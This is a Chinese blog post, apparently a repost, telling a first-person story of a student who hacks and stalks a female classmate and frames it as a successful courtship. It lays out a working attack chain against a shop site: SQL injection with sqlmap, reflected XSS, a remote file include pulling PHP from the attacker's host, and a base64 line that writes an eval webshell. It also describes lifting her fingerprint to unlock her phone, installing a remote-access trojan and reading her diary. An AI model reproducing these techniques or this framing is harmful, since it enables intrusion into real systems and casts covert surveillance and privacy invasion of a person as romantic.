时间:早上8点02分(洛杉矶时间)
作者:gh0stkey
-=–=–=–=–=–=–=–=–=–=–=–=-文章前介:
主角:gh0stkey本人(化名:key)、国外留学学生(妹子)
导火线:带有印子的纸条
文章导读:
一张神秘的纸条出现在主角的生活之中,却让主角颠覆了”屌丝”的身份。纸条模样还原:
当时没想到要拍照,就借下网图。
内容简介:
事情是这样的,在一个阳光明媚的早晨,Key开始了老套的生活方式(洗脸刷牙..)上学去了。…中间省略上课不听讲的趣事。只听”叮铃铃”的下课铃,Key跟往常一样走出教室呼吸下新鲜的空气,可是意外的在走廊上发现了一张纸条。上面的内容大概是一串数字:1001…(大概就是10这两个数字重复的使用)。Key饶有兴趣的看了下,飞快的在大脑中找出了两种解决思路:二进制 摩斯电码。Key再进行思考,发现只有摩斯电码可行(这样与之匹配 1=滴 0=嗒 正好学校最近也教过摩斯电码)
(图1)
这样再进行一次转换(滴 = · 嗒 = -)然后对应图1进行解码,发现结果居然是个中国的手机号。
出于好奇,Key使用了一个手机号位置定位的系统进行了查询:
(位置仅供参考而已。估计手机卡在新疆。)
Key就在想自己班里是不是有一个就是新疆过来的?(其实就是在YY,是男的还是女的)。二话不说就动手把上次备份下来的同学信息档案调出来:
看到一个叫韩雨的,名字一看,果不其然是个妹子!(到这里Key的”屌丝”气质就显露无疑了)。开始进行人肉搜索,这里Key选择了Google进行搜索,先是搜索了”YuHan”的关键词,其实没有多少用处(名字太多找不到有用信息)。再进行手机号的搜索发现了一个网站:
居然搜索到了这个,进去了网站瞬间给跳转到了主页index.html。有经验的人就知道这个页面能被爬到,说明之前存在越权漏洞。(解释:因为一般个人页面,只自己登录才可以访问,这都被爬虫抓取了说明之前所有人都可以访问这个妹子的个人页面, 所以之前就存在了越权漏洞) 。但是到Key开始玩的时候就给修复了,Key顿时脸上就多了几条黑线。。。这彻底激发了Key的屌丝之魂,利用了Safe3进行了SQL注入的扫描 结果:
http://**********************/index.php?shop=17 可能存在SQL注入漏洞
虽然是爆出了可能存在,其实使用SQLMAP注入也是可以的。直接使用正常的语法就注入出来了:
Key看到数据量也是很大的,但并没有去Dump数据而是选择了温柔的方式:
–os-shell
可惜的是并没有权限去执行,无奈,只得继续挖掘其他的漏洞。通过一系列的测试挖到了一个XSS反射(这里的挖掘思路无非就是见参数就使用payload插进去然后看返回的信息进行构造):
不过光一个XSS反射没有什么用,于是Key选择了代码审计这款程序,因为是一款开源的商城程序,很快就可以找到。Key直接使用Tommsearch快速搜索找到后台一处代码:
<?php
include($_GET[‘action’]);
….
明眼人直接可以看出来,存在文件包含漏洞。但是只是后台,该怎么办?于是Key就结合了XSS反射漏洞进行。Key在自己的主机上创建了个文件:1.php内容为:
<?php file_put_contents(‘key.php’,base64_decode(‘QGV2YWwoJF9QT1NUJiM5MTtrZXkmIzkzOyk7Pz4=’)); ?>
然后构建了xss反射的payload:
href.location=”/admin/ad.php?action=http://****.top/1.php”
(其实也可以直接发文件包含的链接,但是这样显得逼格的高,所以最后的xss链接就是http://**********.com/search.php?word=<script src=”http://****.top/1.js”>)
直接跳转到文件包含那个URL中然后包含Key的1.php文件这样就可以创建key.php木马文件了(一句话木马 也就是1.php的代码意思)。流程图:
这边利用的商品评价,发送我们构造的xss链接(内容:你这个商品出错了你看看链接:XSS链接),迷惑下后台的人。OK这次渗透就到这里,Key顺利的拿下了Webshell:
之后Key得到了妹纸的买卖信息,其中步伐有胸罩购买!!(Key这时鼻血已经流出来了啦)。OK获取这些之后,Key整理了下文本就关机睡觉等待第二天去撩那个妹子(韩雨)。
。。。
第二天来到的如此之快,再去学校的路上Key碰见了上学以来对自己很照顾的同桌,并且知道了韩雨的模样(喷血喷血,好漂亮的)。走进了班级,Key东张西望,只见”清爽的头发,清秀的脸皮,清澈的眼眸”,没错就是韩雨!Key以不是很流利的英语跟韩雨打招呼,得来的却是:“我知道你是中国人,我们可以用中国话沟通的。”只听“啪啪啪啪”的响声,Key被打脸了,很疼。。。
经过跟妹子的交流,他们的关系似乎在慢慢的拉近,于是相约去吃牛排(这期间细节就不多讲,就是撩妹子),由于有事情,妹子先走了。Key作为一名职业的“屌丝”!随身携带胶带纸是很有必要的,于是利用胶带纸小心翼翼的采集了西餐刀上的指纹(当时就想以后肯定会用到):
顺利的保留下来之后,下面的才是有趣的。
。。。
又是过了几天,Key由于迟到被留下来罚打扫教室,发现韩雨的抽屉手机没带回去。Key试着打开手机可是有密码,也不知道,懒得用知道的信息做成密码攻击字典了,于是就用之前收集好的指纹信息顺利的解锁了手机,并且打开自己的网盘,种下了以前玩的安卓远控,安然无恙的放回了抽屉中。
。。。
终于,利用木马,Key有了妹子的正脸照:
Key也偷看了她的日记:
1
9.12号,今天有点累,闺蜜们都有男朋友安慰,突然觉得有男朋友真好。
这条日记 Key仿佛看到了希望!!于是Key利用木马来了一条提示消息:
这里已经慢慢的勾引了妹纸寂寞的心,只需要等第二天的实行。
。。。
第二天,Key直接当众表白(这里当然不能少了玫瑰花),结果是成功了!表白内容:
Key:我喜欢你,对不起我入侵了你的手机,其实我是想入侵你的心,你愿意接受我吗?
妹纸(脸红 不知所措):。。。
群众:Together,Together,Together!
最后就这样Key成功的逆袭了“屌丝”的身份,还约了妹纸出去次饭。
转载请注明:即刻安全 » 我是如何通过一张小纸条渗透进了妹子的心